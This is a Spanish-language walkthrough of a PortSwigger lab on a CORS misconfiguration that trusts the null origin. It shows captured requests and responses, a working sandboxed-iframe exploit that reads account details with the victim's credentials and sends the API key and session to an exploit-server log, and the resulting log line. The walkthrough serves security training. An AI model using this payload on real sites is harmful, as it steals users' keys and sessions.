Lab #2 - CORS vulnerability with trusted null origin
https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack
Primero iniciamos sesion y capturamos la siguiente peticion:
GET /accountDetails HTTP/2
Host: 0a8f00470434b5eb82a6608000940062.web-security-academy.net
Cookie: session=xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a8f00470434b5eb82a6608000940062.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
Y la respuesta de esta peticion es la siguiente:
HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "tiJ50DYM9AoTgxTZppTOS0cjWn3w7fHG",
"sessions": [
"xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe"
]
}
Se puede apreciar Access-Control-Allow-Credentials: true y por lo anterior, enviamos la siguiente peticion:
GET /accountDetails HTTP/2
Host: 0a8f00470434b5eb82a6608000940062.web-security-academy.net
Cookie: session=xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe
Origin: null
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a8f00470434b5eb82a6608000940062.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
Esto responde asi:
HTTP/2 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "tiJ50DYM9AoTgxTZppTOS0cjWn3w7fHG",
"sessions": [
"xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe"
]
}
Luego de lo anterior, se procede a crear el exploit para almacenarlo en el exploit server:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0a8f00470434b5eb82a6608000940062.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://exploit-0aef005304e8b51e824a5f4601be0065.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
Y luego de enviar el exploit a la victima se recibe lo siguiente:
200.122.242.138 2024-06-28 20:17:04 +0000 "GET /log?key=%7B%0A%20%20%22username%22%3A%20%22wiener%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22tiJ50DYM9AoTgxTZppTOS0cjWn3w7fHG%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%22xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
Última actualización